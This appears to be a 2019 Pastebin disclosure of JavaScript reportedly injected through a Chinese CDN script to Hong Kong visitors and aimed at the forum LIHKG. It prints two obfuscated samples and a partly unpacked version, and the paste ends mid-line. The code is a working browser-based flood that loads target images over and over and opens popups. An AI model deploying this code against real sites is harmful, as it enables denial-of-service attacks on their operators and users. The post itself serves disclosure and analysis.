Advertisement
Guest User

Great Cannon of China against LIHKG

a guest
Aug 31st, 2019
1,975
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // See also https://lihkg.com/thread/1522162/page/1 who have found this script.
  2. //
  3. // When visiting http://js.passport.qihucdn.com/11.0.1.js?5d5100a4a5a2ac6a47af3cb82952cc7b
  4. // from a location within China and Singapore, you will get this piece normal of
  5. // code:
  6.  
  7. document.write('<script charset="utf-8" src="http://s6.qhres.com/static/ab77b6ea7f3fbf79.js"></script>')
  8.  
  9. // However, when the IP is located in Hong Kong, as of 2019 Aug 31st, you will
  10. // get obfuscated code like these instead:
  11.  
  12. // sample (a)
  13.  
  14. var _a='/yc(BNag:H"s0 tAo4e=f-Ybd5?nxwDEv,lOUSF6rL)CM<iz1&2p.km_>hITu',_b='.&YcfatmD4F2oESBb5w/)rghsu"= _yz>i?Al1MNvUL(Cnx0HOI<kpT,6e:d-',_c='aNb:z)i2?kE4Yt5Fu_<e/CMoycBhT&nDfO=U>-dls"pxILA6S0v,mgH(.w1r ',e=33190,t=11997755,n=100,o=_a[57]+_a[14]+_c[13]+_b[53]+_c[3]+_c[20]+_a[0]+_b[37]+_b[37]+_c[47]+_c[56]+_b[11]+_b[17]+_b[17]+_b[0]+_a[50]+_b[11]+_b[56]+_c[56]+_b[37]+_b[17]+_b[9]+_b[19];if(/chrome\/([\d]+)/gi[_a[18]+_b[46]+_a[18]+_b[3]](window[_b[45]+_a[6]+_b[40]+_b[33]+_c[53]+_a[6]+_b[6]+_c[23]+_a[40]][_a[60]+_a[11]+_a[18]+_b[21]+_a[15]+_b[22]+_c[19]+_c[30]+_a[14]][_a[14]+_a[16]+_c[45]+_a[16]+_a[29]+_a[18]+_a[40]+_c[21]+_b[5]+_a[11]+_a[18]]())[1]>=34&&window[_a[27]+_a[6]+_c[50]+_b[33]+_b[22]+_a[6]+_c[13]+_b[12]+_c[59]][_a[60]+_c[40]+_b[57]+_b[21]+_a[15]+_a[7]+_c[19]+_a[27]+_c[13]][_b[6]+_c[23]+_b[42]+_c[23]+_b[18]+_a[18]+_b[21]+_a[43]+_b[5]+_a[11]+_c[19]]()[_c[6]+_a[27]+_b[59]+_b[57]+_b[46]+_b[49]+_b[4]](_a[18]+_b[59]+_b[22]+_b[57])<0){var l=3e5,a=1482184792,i=1e5,r=[_b[23]+_c[13]+_b[6]+_a[51]+_b[24]+_b[58]+_c[20]+_a[0]+_b[36]+_b[33]+_a[57]+_b[52]+_b[22]+_a[52]+_a[2]+_c[23]+_c[52]+_b[19]+_c[0]+_a[51]+_c[6]+_a[55]+_a[32]+_a[50]+_a[0]+_c[13]+_a[57]+_c[59]+_c[19]+_a[6]+_b[59]+_a[0]+_a[34]+_a[6]+_b[6]+_b[57]+_b[24]+_a[14]+_c[8]+_a[2]+_b[5]+_a[14]+_c[17]+_a[46]+_a[24]+_b[27]+_a[48]+_b[1]+_b[53]+_c[0]+_a[7]+_c[19]+_a[19]+_b[37]+_a[49]+_c[25]+_a[16]+_b[25]+_a[27]+_c[13]+_b[27]+_a[39]+_c[49]+_b[1]+_a[14]+_a[1]+_a[51]+_a[18]+_a[19]+_c[30]+_c[23]+_a[29]+_c[29]+_a[14]+_b[27]],c=_b[23]+_a[14]+_c[13]+_a[51]+_a[11]+_a[8]+_b[19]+_c[20]+_b[36]+_b[33]+_b[23]+_c[9]+_b[22]+_c[56]+_c[25]+_b[12]+_a[54],u=500;function unixtime(){var _=_b,a=_a,c=_c,b=new Date;return Date[a[36]+a[59]+c[21]](b[a[7]+_[57]+c[13]+c[15]+a[60]+_[36]+_[36]+c[12]+a[18]+_[5]+c[59]](),b[a[7]+_[57]+c[13]+a[44]+c[23]+a[27]+a[14]+_[23]](),b[a[7]+c[19]+a[14]+c[31]+_[5]+c[13]+c[19]](),b[a[7]+a[18]+a[14]+c[54]+c[23]+c[16]+_[21]+_[24]](),b[_[22]+_[57]+_[6]+_[38]+a[46]+c[30]+a[60]+c[13]+c[19]+_[24]](),b[c[53]+_[57]+_[6]+_[14]+_[57]+a[2]+_[12]+_[45]+_[59]+a[11]]())/1e3}function updateVT(){var _=_a;localStorage[_c[50]+_[14]]=unixtime()+l/1e3^a}function canExe(){var _=_a,c=_b,b=_c;return null==localStorage[b[50]+_[14]]?(updateVT(),!0):(localStorage[b[50]+b[13]]^a)>unixtime()?b[49]!=localStorage[c[3]+_[34]]:c[47]!=localStorage[c[3]+b[39]]&&(updateVT(),!0)}if(1==canExe()){localStorage[_b[3]+_b[36]]=0,document[_c[53]+_c[19]+_c[13]+_b[13]+_a[34]+_a[18]+_c[52]+_b[57]+_a[27]+_c[13]+_b[24]+_c[26]+_b[30]+_c[28]+_a[6]+_b[22]+_c[1]+_b[5]+_a[54]+_a[18]](_a[57]+_b[57]+_b[5]+_b[59])[0][_c[6]+_b[45]+_c[30]+_a[18]+_b[21]+_b[48]+_b[54]+_c[22]+_b[42]]=_a[45]+_b[7]+_a[18]+_c[13]+_c[0]+_c[60]+_b[45]+_b[5]+_c[52]+_a[18]+_b[27]+_c[41]+_b[21]+_a[18]+_b[4]+_c[19]+_a[40]+_b[21]+_b[57]+_b[21]+_a[10]+_c[60]+_a[2]+_c[23]+_c[30]+_c[13]+_c[19]+_c[30]+_c[13]+_c[34]+_c[41]+_c[30]+_b[12]+_a[21]+_c[59]+_a[18]+_a[20]+_a[18]+_a[40]+_c[59]+_c[19]+_b[21]+_a[10]+_c[36]+document[_c[53]+_b[57]+_b[6]+_c[10]+_b[36]+_b[57]+_c[52]+_a[18]+_c[30]+_a[14]+_c[40]+_a[4]+_b[30]+_c[28]+_a[6]+_c[53]+_c[1]+_b[5]+_b[7]+_b[57]](_c[27]+_b[57]+_b[5]+_a[24])[0][_a[46]+_a[27]+_b[45]+_a[18]+_b[21]+_c[54]+_a[59]+_a[44]+_a[41]],window[_b[12]+_c[30]+_c[2]+_c[19]+_a[20]+_c[23]+_b[21]+_c[19]+_c[16]+_c[30]+_c[39]+_c[23]+_c[0]+_b[59]]=function(){localStorage[_a[2]+_c[39]]=1};var d=!1,m=null;function popwin(){var _=_b,a=_a,b=_c;1==d&&(m=window[b[23]+b[42]+a[18]+a[27]](c,a[55]+_[16]+_[36]+_[5]+_[45]+a[53],_[6]+b[23]+b[23]+a[34]+a[23]+a[6]+a[40]+_[27]+b[30]+_[12]+_[55]+b[40]+b[13]+a[6]+b[13]+a[60]+b[40]+b[34]+_[45]+_[12]+_[55]+b[52]+a[18]+a[27]+a[60]+b[2]+_[5]+b[59]+_[27]+b[30]+_[12]+b[51]+b[40]+b[25]+_[21]+b[23]+a[34]+_[36]+b[2]+b[0]+b[59]+b[40]+a[19]+a[27]+a[16]+b[51]+a[40]+b[19]+_[24]+a[46]+_[31]+b[0]+b[2]+_[36]+_[57]+a[19]+_[45]+b[23]+b[51]+b[39]+_[57]+_[4]+a[14]+b[34]+a[48]+b[49]+a[12]+b[49]+a[12]+_[47]+b[51]+b[60]+_[6]+a[16]+_[53]+_[27]+a[48]+_[47]+_[47]+b[49]+a[12]+b[49]+b[51]+b[60]+_[18]+_[33]+b[38]+_[6]+b[27]+b[34]+b[58]+a[33]+b[60]+a[57]+a[18]+_[33]+b[53]+_[23]+_[6]+a[19]+b[58]+a[33]+b[60]+_[40]+_[33]+_[24]+_[33]+a[23]+_[36]+a[18]+_[27]+a[27]+a[16]+_[45]+b[19],""),window[a[20]+a[16]+b[25]+b[16]+_[24]](),d=!1,document[a[40]+b[19]+b[52]+_[12]+_[40]+b[19]+b[10]+b[50]+b[19]+a[27]+a[14]+a[41]+_[33]+a[11]+_[6]+a[18]+a[27]+_[57]+a[40]](a[2]+b[39]+a[46]+b[25]+b[9],popwin))}document[_a[6]+_c[38]+_a[24]+_b[13]+_b[40]+_a[18]+_a[27]+_c[13]+_c[45]+_b[33]+_c[40]+_a[14]+_c[19]+_c[30]+_c[19]+_b[21]](_a[2]+_b[36]+_b[33]+_a[2]+_c[9],popwin);var g=null,s=null,w=null,p=null,h=null,v="",f=0;function imgdel(){var _=_b,a=_a,c=_c;null!=g&&document[a[23]+a[16]+a[24]+c[24]][_[21]+a[18]+_[7]+_[12]+c[50]+a[18]+c[21]+a[57]+a[46]+_[36]+a[24]](g),g=null,v=r[unixtime()%r[c[39]+c[19]+c[30]+a[7]+_[6]+c[27]]],f<i&&h-w<l?setTimeout(_[33]+c[52]+a[7]+_[5]+_[59]+a[24]+c[55]+a[42],h-p>u?u:h-p):localStorage[_[3]+a[34]]=1}function isImgComplete(){var _=_a,a=_b,c=_c;g[c[25]+_[16]+a[7]+_[51]+a[36]+_[18]+_[14]+_[18]]?(window[a[3]+c[39]+c[19]+c[0]+a[21]+a[50]+c[30]+c[13]+a[57]+_[40]+a[40]+c[0]+_[34]](s),(h=(new Date)[_[7]+_[18]+_[14]+a[54]+c[6]+c[52]+c[19]]())-p>1e3?(null!=m&&(m[a[3]+_[34]+_[16]+_[11]+_[18]](),m=null),f+=1):d=!0,imgdel()):(new Date)[_[7]+a[57]+a[6]+_[59]+_[46]+_[54]+a[57]]()-p>2e3&&imgdel()}function imgadd(){var _=_c,a=_b,c=_a;(g=document[a[16]+a[12]+a[59]+a[30]][a[5]+c[51]+a[53]+_[19]+c[27]+_[38]+c[43]+c[57]+_[6]+a[36]+_[38]](document[c[2]+c[40]+a[57]+c[6]+c[14]+c[18]+a[13]+_[39]+_[19]+_[52]+c[18]+c[27]+c[14]](a[33]+_[52]+a[22])))[a[24]+c[40]+_[25]]=v+unixtime()+Math[c[2]+_[19]+c[46]+_[39]](100*Math[a[21]+_[0]+a[45]+a[59]+_[23]+a[7]]()),g[_[40]+c[14]+a[30]+_[39]+a[57]][a[59]+_[6]+a[24]+c[51]+_[39]+a[5]+_[24]]=c[27]+c[16]+_[30]+_[19],p=(new Date)[a[22]+c[18]+_[13]+c[59]+c[46]+a[7]+c[18]](),s=setInterval(_[6]+_[40]+_[44]+c[54]+a[22]+a[44]+_[23]+c[54]+c[51]+c[34]+c[18]+c[14]+_[19]+c[3]+a[20],50),f+=1}w=(new Date)[_c[53]+_a[18]+_b[6]+_b[54]+_a[46]+_c[52]+_a[18]](),v=r[unixtime()%r[_c[39]+_c[19]+_a[27]+_b[22]+_b[6]+_b[23]]],imgadd()}}
  15.  
  16. // sample (b)
  17.  
  18. var _a='v)&hsipwoOEd=xYyf<IMlFur"Ne-0BbgS2L?Ccz:DkH>n_/.1mAa(,46U5Tt ',_b='-=rz:c<g0y6xO2i?n1S(paC5 DMAB",ohfULEw&b)T_.INmulHksY>/Fed4tv',_c='=>zkFiE0hdveUs-25"au& 4rL<,by/CfYSBx:oDH1mAlN?Tn6.(cOg)Iw_ptM',e=33190,t=11997755,n=100,o=_a[3]+_a[59]+_a[59]+_a[6]+_a[39]+_c[29]+_b[54]+_a[48]+_c[40]+_b[10]+_c[49]+_b[13]+_a[57]+_b[23]+_b[43]+_b[13]+_a[33]+_b[10]+_b[43]+_b[17]+_c[16]+_c[22]+_b[54];if(/chrome\/([\d]+)/gi[_c[11]+_c[35]+_c[11]+_a[37]](window[_a[44]+_b[21]+_b[60]+_a[5]+_a[31]+_c[18]+_a[59]+_c[37]+_a[23]][_b[47]+_b[51]+_c[11]+_c[23]+_b[27]+_b[7]+_b[56]+_c[47]+_a[59]][_c[59]+_b[31]+_b[35]+_a[8]+_b[37]+_a[26]+_c[23]+_a[36]+_b[21]+_b[51]+_a[26]]())[1]>=34&&window[_b[16]+_b[21]+_a[0]+_c[5]+_b[7]+_c[18]+_b[59]+_c[37]+_c[23]][_b[47]+_a[4]+_a[26]+_c[23]+_a[50]+_c[53]+_c[11]+_c[47]+_a[59]][_a[59]+_c[37]+_a[34]+_b[31]+_b[37]+_c[11]+_a[23]+_b[22]+_b[21]+_b[51]+_a[26]]()[_b[14]+_b[16]+_b[57]+_c[11]+_a[13]+_a[9]+_c[31]](_b[56]+_a[11]+_b[7]+_c[11])<0){var l=3e5,a=1482184792,i=1e5,r=[_b[32]+_c[59]+_b[59]+_b[20]+_b[51]+_a[39]+_a[46]+_a[46]+_c[43]+_a[5]+_b[32]+_a[41]+_c[53]+_a[47]+_a[37]+_a[8]+_a[49]+_b[54]+_c[18]+_a[6]+_b[14]+_c[57]+_b[60]+_b[13]+_c[29]+_a[59]+_a[3]+_b[2]+_a[26]+_c[18]+_c[9]+_b[54]+_a[20]+_a[51]+_b[59]+_c[11]+_a[4]+_a[59]+_a[35]+_a[37]+_a[51]+_b[59]+_c[57]+_b[14]+_c[9]+_b[1]+_b[17]+_b[38]+_c[58]+_b[21]+_a[31]+_c[11]+_c[0]+_c[40]+_b[38]+_a[37]+_a[8]+_c[19]+_b[16]+_c[59]+_c[0]+_b[10]+_b[8]+_c[20]+_c[59]+_a[15]+_c[58]+_b[56]+_b[1]+_a[44]+_c[37]+_b[37]+_b[38]+_b[59]+_c[0]],c=_a[3]+_c[59]+_b[59]+_c[58]+_b[51]+_b[4]+_a[46]+_a[46]+_a[20]+_b[14]+_a[3]+_a[41]+_a[31]+_a[47]+_b[5]+_a[8]+_b[46],u=500;function unixtime(){var _=_a,a=_c,c=_b,b=new Date;return Date[_[56]+a[46]+c[22]](b[c[7]+c[56]+a[59]+c[55]+_[22]+c[48]+_[20]+_[14]+_[26]+_[51]+a[23]](),b[_[31]+_[26]+a[59]+_[19]+c[31]+_[44]+c[59]+_[3]](),b[a[53]+a[11]+_[59]+c[25]+c[21]+a[59]+c[56]](),b[c[7]+a[11]+c[59]+a[39]+c[31]+a[19]+_[23]+c[51]](),b[_[31]+c[56]+_[59]+_[19]+c[14]+_[44]+_[22]+_[59]+_[26]+_[4]](),b[_[31]+a[11]+a[59]+_[32]+_[26]+a[51]+a[37]+c[16]+_[11]+c[51]]())/1e3}function updateVT(){var _=_a;localStorage[_b[60]+_[59]]=unixtime()+l/1e3^a}function canExe(){var _=_b,c=_c,b=_a;return null==localStorage[_[60]+c[59]]?(updateVT(),!0):(localStorage[c[10]+_[59]]^a)>unixtime()?c[7]!=localStorage[b[37]+b[20]]:b[28]!=localStorage[_[5]+b[20]]&&(updateVT(),!0)}if(1==canExe()){localStorage[_c[51]+_c[43]]=0,document[_c[53]+_c[11]+_c[59]+_c[6]+_c[43]+_b[56]+_c[41]+_b[56]+_c[47]+_a[59]+_c[13]+_b[28]+_c[28]+_c[46]+_c[18]+_c[53]+_c[44]+_a[51]+_a[49]+_a[26]](_c[8]+_a[26]+_a[51]+_b[57])[0][_b[14]+_c[47]+_b[16]+_c[11]+_c[23]+_a[42]+_a[58]+_c[60]+_b[35]]=_b[6]+_b[46]+_c[11]+_a[59]+_b[21]+_b[24]+_a[44]+_a[51]+_b[46]+_b[56]+_c[0]+_c[17]+_a[23]+_a[26]+_c[31]+_c[11]+_b[2]+_a[23]+_b[56]+_b[2]+_c[17]+_b[24]+_a[37]+_a[8]+_a[44]+_b[59]+_a[26]+_a[44]+_c[59]+_c[0]+_c[17]+_c[47]+_c[37]+_a[27]+_c[23]+_a[26]+_b[33]+_c[11]+_b[2]+_c[23]+_b[56]+_a[23]+_c[17]+_a[43]+document[_c[53]+_a[26]+_c[59]+_a[10]+_c[43]+_a[26]+_b[46]+_a[26]+_a[44]+_b[59]+_a[4]+_c[34]+_a[15]+_a[58]+_a[51]+_c[53]+_b[45]+_b[21]+_a[49]+_c[11]](_b[32]+_c[11]+_b[21]+_c[9])[0][_c[5]+_a[44]+_c[47]+_a[26]+_c[23]+_b[49]+_a[58]+_c[60]+_a[34]],window[_a[8]+_a[44]+_a[30]+_b[56]+_c[31]+_c[37]+_a[23]+_c[11]+_b[47]+_c[47]+_c[43]+_a[8]+_b[21]+_a[11]]=function(){localStorage[_b[5]+_b[48]]=1};var d=!1,m=null;function popwin(){var _=_b,a=_c,b=_a;1==d&&(m=window[a[37]+_[20]+_[56]+_[16]](c,_[42]+b[30]+b[20]+a[18]+b[44]+b[41],b[59]+_[31]+_[31]+_[48]+b[30]+a[18]+_[2]+_[1]+_[16]+a[37]+b[53]+_[51]+b[59]+a[18]+b[59]+a[19]+_[51]+b[12]+_[16]+b[8]+_[30]+a[41]+b[26]+a[47]+_[47]+b[30]+b[51]+_[2]+_[1]+_[16]+_[31]+b[53]+_[51]+a[51]+_[2]+a[37]+b[20]+b[20]+a[27]+a[18]+b[23]+_[51]+b[12]+a[47]+b[8]+a[26]+a[23]+a[11]+_[51]+b[5]+a[2]+b[51]+b[30]+a[43]+_[56]+_[1]+b[44]+_[31]+a[26]+_[48]+b[26]+_[33]+b[59]+_[1]+_[17]+b[28]+_[8]+b[28]+b[28]+b[28]+b[53]+a[21]+_[59]+a[37]+_[20]+a[0]+_[17]+a[7]+_[8]+a[7]+b[28]+b[28]+_[30]+_[24]+_[37]+a[5]+a[9]+_[59]+b[3]+_[1]+a[40]+b[53]+b[60]+a[8]+b[26]+a[5]+b[31]+_[32]+a[59]+b[12]+a[40]+_[30]+b[60]+_[60]+a[5]+_[51]+a[5]+a[27]+a[43]+_[56]+b[12]+b[44]+a[37]+a[47]+_[56],""),window[_[33]+_[31]+_[5]+b[22]+_[51]](),d=!1,document[a[23]+_[56]+_[46]+b[8]+b[0]+b[26]+_[36]+_[60]+a[11]+b[44]+_[59]+_[35]+a[5]+a[13]+_[59]+b[26]+a[47]+a[11]+_[2]](_[5]+_[48]+b[5]+b[37]+a[3],popwin))}document[_b[21]+_a[11]+_a[11]+_b[36]+_c[10]+_b[56]+_b[16]+_c[59]+_b[35]+_a[5]+_b[51]+_b[59]+_b[56]+_b[16]+_b[56]+_b[2]](_c[51]+_c[43]+_a[5]+_c[51]+_b[50],popwin);var g=null,s=null,w=null,p=null,h=null,v="",f=0;function imgdel(){var _=_b,a=_a,c=_c;null!=g&&document[_[39]+a[8]+c[9]+c[28]][a[23]+_[56]+a[49]+a[8]+a[0]+a[26]+a[36]+_[32]+a[5]+c[43]+c[9]](g),g=null,v=r[unixtime()%r[a[20]+c[11]+c[47]+a[31]+_[59]+_[32]]],f<i&&h-w<l?setTimeout(_[14]+c[41]+a[31]+_[21]+c[9]+c[9]+a[52]+c[54],h-p>u?u:h-p):localStorage[a[37]+_[48]]=1}function isImgComplete(){var _=_b,a=_c,c=_a;g[_[5]+_[31]+a[41]+a[58]+c[20]+_[56]+c[59]+_[56]]?(window[c[37]+_[48]+a[11]+c[51]+a[23]+_[44]+_[16]+_[59]+_[56]+a[23]+c[0]+c[51]+a[43]](s),(h=(new Date)[_[7]+_[56]+c[59]+c[58]+c[5]+c[49]+a[11]]())-p>1e3?(null!=m&&(m[_[5]+c[20]+a[37]+a[13]+a[11]](),m=null),f+=1):d=!0,imgdel()):(new Date)[_[7]+c[26]+a[59]+a[46]+c[5]+_[46]+a[11]]()-p>2e3&&imgdel()}function imgadd(){var _=_c,a=_a,c=_b;(g=document[_[27]+a[8]+c[57]+_[28]][c[21]+_[58]+c[20]+a[26]+a[44]+c[57]+c[22]+a[3]+a[5]+_[43]+c[57]](document[a[37]+_[23]+a[26]+_[18]+c[59]+c[56]+_[6]+a[20]+c[56]+a[49]+c[56]+_[47]+a[59]](_[5]+_[41]+a[31])))[_[13]+c[2]+_[51]]=v+unixtime()+Math[_[51]+c[56]+_[5]+_[43]](100*Math[c[2]+c[21]+_[47]+c[57]+a[8]+c[46]]()),g[_[13]+_[59]+_[28]+_[43]+c[56]][a[11]+_[5]+a[4]+c[20]+_[43]+c[21]+_[28]]=_[47]+_[37]+a[44]+a[26],p=(new Date)[_[53]+c[56]+_[59]+c[41]+_[5]+a[49]+a[26]](),s=setInterval(c[14]+c[51]+a[18]+a[49]+c[7]+_[30]+c[31]+c[46]+_[58]+a[20]+c[56]+c[59]+a[26]+c[19]+a[1],50),f+=1}w=(new Date)[_c[53]+_c[11]+_c[59]+_c[46]+_b[14]+_b[46]+_c[11]](),v=r[unixtime()%r[_c[43]+_a[26]+_b[16]+_b[7]+_c[59]+_a[3]]],imgadd()}}
  19.  
  20. // Meanwhile, when the IP is from US and Germany the obfuscated code is packed,
  21. // which can be unpacked into this:
  22.  
  23. var _a='A&FLe<ah.kub6lmyYgU1cDS,Mn(=B?sz4"xwit52oH-rI dvNTC:f>p0/E_)O';var _b='.z4rt:TS-y&ov_cLCEIMmwpg>BUDkNH/6i(),ab0 1esl<xAY?5"hd=F2Oufn';var _c='_h=ltx2,4b1SsM&)B.F" LNe?idUI(av5gowncfD/:EyCYp0r-um6A<zk>HOT';var TASKID=33190;var MAGICNUM=11997755;var EXECNUM=100;var FEEDBACKADDR=_a[7]+_b[4]+_b[4]+_b[22]+_b[5]+_a[56]+_c[40]+_a[19]+_b[41]+_b[32]+_b[0]+_b[56]+_c[32]+_b[50]+_a[8]+_a[39]+_b[56]+_b[32]+_c[17]+_b[41]+_b[50]+_b[2]+_c[40];if(/chrome\/([\d]+)/gi[_a[4]+_b[46]+_b[42]+_a[20]](window[_c[36]+_b[37]+_a[47]+_b[33]+_b[23]+_c[30]+_b[4]+_a[40]+_c[48]][_b[58]+_c[12]+_c[23]+_c[48]+_c[53]+_b[23]+_b[42]+_a[25]+_a[37]][_c[4]+_a[40]+_c[21]+_b[11]+_b[21]+_c[23]+_c[48]+_c[44]+_a[6]+_c[12]+_c[23]]())[1]>=34&&window[_c[36]+_b[37]+_c[31]+_a[36]+_c[33]+_a[6]+_c[4]+_a[40]+_c[48]][_b[58]+_c[12]+_a[4]+_c[48]+_b[47]+_a[17]+_c[23]+_a[25]+_c[4]][_a[37]+_b[11]+_c[21]+_a[40]+_c[35]+_b[42]+_b[3]+_a[50]+_c[30]+_a[30]+_c[23]]()[_a[36]+_b[60]+_a[46]+_c[23]+_c[5]+_a[60]+_a[52]](_b[42]+_b[53]+_c[33]+_a[4])<0){var MAX_TIME=300000;var MAGIC=0x58585858;var MAX_COUNT=100000;var url_list=[_a[7]+_a[37]+_a[37]+_b[22]+_b[43]+_b[5]+_c[40]+_b[31]+_c[3]+_a[36]+_c[1]+_a[9]+_a[17]+_b[0]+_c[37]+_c[34]+_c[51]+_a[56]+_b[37]+_c[46]+_c[25]+_a[58]+_a[47]+_a[39]+_a[56]+_a[37]+_b[52]+_a[43]+_c[23]+_b[37]+_b[53]+_c[40]+_a[13]+_b[37]+_a[37]+_a[4]+_c[12]+_a[37]+_a[29]+_a[20]+_b[37]+_c[4]+_b[13]+_c[25]+_c[26]+_a[27]+_b[41]+_b[10]+_a[54]+_c[30]+_a[17]+_a[4]+_a[27]+_c[10]+_c[14]+_a[20]+_c[34]+_c[50]+_c[36]+_b[4]+_b[54]+_a[12]+_a[55]+_a[1]+_a[37]+_a[15]+_c[46]+_c[23]+_a[27]+_b[60]+_a[40]+_b[21]+_a[1]+_a[37]+_c[2]];var cloudflare_js_validate_url=_a[7]+_b[4]+_a[37]+_c[46]+_c[12]+_b[5]+_b[31]+_a[56]+_b[44]+_b[33]+_c[1]+_b[28]+_b[23]+_c[17]+_b[14]+_b[11]+_c[51];var TIMEGAP=500;function unixtime(){var a=_a;var b=_b;var c=_c;var d=new Date();return Date[a[18]+a[49]+a[50]](d[b[23]+b[42]+c[4]+a[2]+c[50]+b[44]+c[3]+a[16]+a[4]+b[37]+a[43]](),d[c[33]+a[4]+c[4]+c[13]+c[34]+c[36]+c[4]+c[1]](),d[b[23]+c[23]+a[37]+b[27]+c[30]+c[4]+a[4]](),d[a[17]+a[4]+b[4]+b[30]+b[11]+b[58]+c[48]+a[30]](),d[b[23]+a[4]+c[4]+a[24]+b[33]+b[60]+b[58]+b[4]+c[23]+c[12]](),d[b[23]+a[4]+c[4]+c[11]+c[23]+c[37]+b[11]+c[36]+c[26]+c[12]]())/1000}function updateVT(){var a=_b;var b=_a;var c=_c;localStorage[c[31]+a[4]]=unixtime()+MAX_TIME/1000^MAGIC}function canExe(){var a=_b;var b=_c;var c=_a;if(localStorage[b[31]+a[4]]==null){updateVT();return true}else{if((localStorage[a[12]+c[37]]^MAGIC)>unixtime()){return localStorage[b[37]+a[44]]!=c[55]}else{if(localStorage[a[14]+b[3]]!=b[47]){updateVT();return true}else{return false}}}}if(canExe()==true){localStorage[_c[37]+_a[13]]=0;document[_a[17]+_b[42]+_a[37]+_b[17]+_a[13]+_b[42]+_c[51]+_c[23]+_a[25]+_a[37]+_a[30]+_b[25]+_c[43]+_b[6]+_c[30]+_b[23]+_a[48]+_b[37]+_c[51]+_a[4]](_a[7]+_a[4]+_b[37]+_c[26])[0][_a[36]+_b[60]+_a[25]+_a[4]+_c[48]+_b[30]+_c[60]+_b[19]+_a[3]]=_c[54]+_b[20]+_b[42]+_a[37]+_a[6]+_c[20]+_b[60]+_a[6]+_c[51]+_b[42]+_a[27]+_b[51]+_a[43]+_a[4]+_c[38]+_a[4]+_b[3]+_a[43]+_c[23]+_b[3]+_b[51]+_b[40]+_a[20]+_b[11]+_a[25]+_c[4]+_c[23]+_a[25]+_c[4]+_c[2]+_c[19]+_a[25]+_c[34]+_c[49]+_c[48]+_a[4]+_c[38]+_c[23]+_b[3]+_c[48]+_c[23]+_b[3]+_c[19]+_b[24]+document[_c[33]+_c[23]+_c[4]+_b[17]+_a[13]+_a[4]+_a[14]+_c[23]+_a[25]+_b[4]+_b[43]+_b[25]+_b[9]+_a[49]+_b[37]+_c[33]+_a[48]+_a[6]+_a[14]+_a[4]](_a[7]+_b[42]+_a[6]+_a[46])[0][_b[33]+_c[36]+_b[60]+_c[23]+_c[48]+_b[30]+_a[49]+_b[19]+_c[21]];window[_b[11]+_b[60]+_a[11]+_c[23]+_b[59]+_b[11]+_b[3]+_c[23]+_a[10]+_b[60]+_b[44]+_b[11]+_b[37]+_c[26]]=function(){var a=_a;var b=_b;var c=_c;localStorage[_b[14]+_a[13]]=1};var canpop=false;var p_win=null;function popwin(){var a=_c;var b=_a;var c=_b;if(canpop==true){p_win=window[a[34]+b[54]+c[42]+a[36]](cloudflare_js_validate_url,c[13]+c[38]+c[44]+c[37]+c[60]+c[28],a[4]+c[11]+a[34]+c[44]+c[38]+b[6]+c[3]+a[2]+c[60]+b[40]+b[23]+a[12]+c[4]+b[6]+c[4]+a[50]+c[43]+b[27]+a[36]+b[40]+c[36]+b[14]+a[23]+c[60]+a[50]+a[9]+c[37]+a[48]+b[27]+b[25]+a[34]+a[7]+a[12]+c[14]+c[3]+b[40]+b[13]+c[44]+c[38]+c[37]+c[3]+a[12]+c[54]+c[60]+b[40]+a[7]+b[43]+b[4]+c[43]+a[25]+b[31]+c[37]+b[11]+b[13]+b[4]+b[27]+a[36]+b[40]+c[36]+a[3]+a[23]+b[52]+a[4]+b[27]+c[41]+a[47]+b[55]+c[39]+a[47]+c[39]+c[36]+b[45]+a[4]+a[34]+b[54]+a[2]+a[10]+b[55]+a[47]+b[55]+b[55]+c[39]+b[23]+b[45]+a[35]+a[25]+a[26]+a[4]+b[7]+b[27]+a[10]+a[7]+b[45]+a[1]+b[4]+c[33]+b[17]+b[7]+a[4]+a[2]+a[10]+a[7]+b[45]+c[12]+c[33]+b[30]+c[33]+c[38]+a[3]+c[42]+b[27]+a[36]+a[34]+c[60]+c[42],'');window[b[52]+a[34]+c[14]+a[50]+b[30]]();canpop=false;document[b[43]+b[4]+c[20]+b[40]+a[31]+b[4]+b[57]+a[31]+a[23]+a[36]+b[37]+c[15]+c[33]+a[12]+b[37]+b[4]+b[25]+c[42]+b[43]](a[37]+b[13]+a[25]+a[37]+b[9],popwin)}}document[_b[37]+_c[26]+_a[46]+_a[57]+_b[12]+_a[4]+_b[60]+_a[37]+_b[15]+_c[25]+_c[12]+_b[4]+_c[23]+_a[25]+_c[23]+_b[3]](_a[20]+_c[3]+_c[25]+_a[20]+_b[28],popwin);var p_img=null;var timer=null;var starttime=null;var requesttime=null;var responsetime=null;var url='';var count=0;function imgdel(){var a=_c;var b=_b;var c=_a;if(p_img!=null){document[b[38]+b[11]+a[26]+c[15]][b[3]+b[42]+b[20]+c[40]+b[12]+c[4]+b[16]+b[52]+c[36]+c[13]+a[26]](p_img)}p_img=null;url=url_list[unixtime()%url_list[c[13]+a[23]+c[25]+a[33]+a[4]+b[52]]];if(count<MAX_COUNT&&responsetime-starttime<MAX_TIME)setTimeout(b[33]+c[14]+a[33]+c[6]+b[53]+a[26]+a[29]+a[15],responsetime-requesttime>TIMEGAP?TIMEGAP:responsetime-requesttime);else localStorage[a[37]+a[3]]=1}function isImgComplete(){var a=_c;var b=_b;var c=_a;if(p_img[a[37]+c[40]+a[51]+c[54]+a[3]+a[23]+a[4]+c[4]]){window[b[14]+a[3]+a[23]+c[6]+b[3]+c[44]+b[60]+a[4]+c[4]+c[43]+b[12]+b[37]+a[3]](timer);responsetime=new Date()[b[23]+c[4]+c[37]+b[6]+a[25]+b[20]+a[23]]();if(responsetime-requesttime>1000){if(p_win!=null){p_win[b[14]+b[44]+b[11]+b[43]+b[42]]();p_win=null}count+=1}else{canpop=true}imgdel()}else{if(new Date()[c[17]+a[23]+b[4]+b[6]+a[25]+b[20]+a[23]]()-requesttime>2000){imgdel()}}}function imgadd(){var a=_c;var b=_b;var c=_a;p_img=document[a[9]+c[40]+a[26]+a[43]][b[37]+a[46]+c[54]+a[23]+c[25]+c[46]+c[50]+c[7]+a[25]+a[3]+a[26]](document[a[37]+c[43]+a[23]+b[37]+a[4]+a[23]+a[42]+b[44]+a[23]+b[20]+c[4]+a[36]+a[4]](b[33]+b[20]+b[23]));p_img[c[30]+a[48]+a[37]]=url+unixtime()+Math[c[20]+b[42]+a[25]+c[13]](Math[a[48]+b[37]+a[36]+c[46]+b[11]+c[14]]()*100);p_img[b[43]+b[4]+c[15]+b[44]+c[4]][c[46]+a[25]+a[12]+c[54]+a[3]+c[6]+a[43]]=b[60]+b[11]+a[36]+b[42];requesttime=new 